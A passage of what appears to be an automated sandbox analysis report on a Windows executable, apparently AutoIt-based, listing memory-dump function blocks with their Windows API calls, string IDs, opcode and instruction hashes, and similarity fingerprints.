                                                                                                                                                          • Opcode Fuzzy Hash: cc019d5262a3084bb1502245ff3de6a615d2e40ac49d7e09abe8152d58537697
                                                                                                                                                          • Instruction Fuzzy Hash: 73E0D87360022927D720EAA6AC4AE9BFBACEB51764F000026F924D7181D7B0D68587E0
                                                                                                                                                          APIs
                                                                                                                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0015B36B
                                                                                                                                                            • Part of subcall function 00142011: _doexit.LIBCMT ref: 0014201B
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Message_doexit
                                                                                                                                                          • String ID: AutoIt$Error allocating memory.
                                                                                                                                                          • API String ID: 1993061046-4017498283
                                                                                                                                                          • Opcode ID: 29d5c44af3254301c5d3fecf23108eb951f5fda560314e36f1d9785aa66c66ec
                                                                                                                                                          • Instruction ID: 90c59cda690c1ecff5980d3c63dd27928cb9c912f67b3d99334b764e78723728
                                                                                                                                                          • Opcode Fuzzy Hash: 29d5c44af3254301c5d3fecf23108eb951f5fda560314e36f1d9785aa66c66ec
                                                                                                                                                          • Instruction Fuzzy Hash: 6FD0123128872833D21936957C47FD566888F15B51F140416FF48665D28BE294D041D9
                                                                                                                                                          APIs
                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(?), ref: 0019BAB8
                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0019BCAB
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DirectoryFreeLibrarySystem
                                                                                                                                                          • String ID: WIN_XPe
                                                                                                                                                          • API String ID: 510247158-3257408948
                                                                                                                                                          • Opcode ID: a1dd1c0b62588d9c38b66f9e1678a09a59d0c1ec302626bcd63be4c9ec45bd56
                                                                                                                                                          • Instruction ID: 245213639c808e29b1306cbcd043b8d42ebfd052e96d7b186dac4dcb1941d452
                                                                                                                                                          • Opcode Fuzzy Hash: a1dd1c0b62588d9c38b66f9e1678a09a59d0c1ec302626bcd63be4c9ec45bd56
                                                                                                                                                          • Instruction Fuzzy Hash: 3FE0C970C0811DEFCF15DBA8E985AECB7B8BB08300F15C886E022B3450C7719A45DF21
                                                                                                                                                          APIs
                                                                                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0018849F
                                                                                                                                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 001884B2
                                                                                                                                                            • Part of subcall function 00168355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 001683CD
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FindMessagePostSleepWindow
                                                                                                                                                          • String ID: Shell_TrayWnd
                                                                                                                                                          • API String ID: 529655941-2988720461
                                                                                                                                                          • Opcode ID: 1a317db207c2eaad5421c0632d2ffe122f80728d525fc0454b17e5e2f7d18548
                                                                                                                                                          • Instruction ID: 7e0fc88aa99e6a493327441b43e4783996094014868fc2fe7285ef10f747d8a3
                                                                                                                                                          • Opcode Fuzzy Hash: 1a317db207c2eaad5421c0632d2ffe122f80728d525fc0454b17e5e2f7d18548
                                                                                                                                                          • Instruction Fuzzy Hash: 6DD0A932384300B7E624A370AC0BFD26A04AB24B00F000929720AAA6C0CAA0B8008220
                                                                                                                                                          APIs
                                                                                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001884DF
                                                                                                                                                          • PostMessageW.USER32(00000000), ref: 001884E6
                                                                                                                                                            • Part of subcall function 00168355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 001683CD
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FindMessagePostSleepWindow
                                                                                                                                                          • String ID: Shell_TrayWnd
                                                                                                                                                          • API String ID: 529655941-2988720461
                                                                                                                                                          • Opcode ID: da4a9e0288115a1856acbe332fac7f631fd417593f87efc998077dcd19472065
                                                                                                                                                          • Instruction ID: 0893a641d3d1939adf9c54a2ec17f5523677f3ebd975d604914a2dcae257da67
                                                                                                                                                          • Opcode Fuzzy Hash: da4a9e0288115a1856acbe332fac7f631fd417593f87efc998077dcd19472065
                                                                                                                                                          • Instruction Fuzzy Hash: 85D022323803007BE724A370AC0FFC37604EB29B00F000929730AAA6C0CAF0F800C321
                                                                                                                                                          APIs
                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 0016D01E
                                                                                                                                                          • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0016D035
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Temp$FileNamePath
                                                                                                                                                          • String ID: aut
                                                                                                                                                          • API String ID: 3285503233-3010740371
                                                                                                                                                          • Opcode ID: 990b6c71224d04ecd0c05924a8f433ac6da0d7e59926ee093412582f4e28e4f0
                                                                                                                                                          • Instruction ID: 8e8d8cf80b45a8d642fffe68fd584a10b07410bb7b35170942414d933f3f8b83
                                                                                                                                                          • Opcode Fuzzy Hash: 990b6c71224d04ecd0c05924a8f433ac6da0d7e59926ee093412582f4e28e4f0
                                                                                                                                                          • Instruction Fuzzy Hash: 43D05EB154030EBBDB10ABA0ED0EF99776CA700709F1041927615D14D1D7B0D685CBA1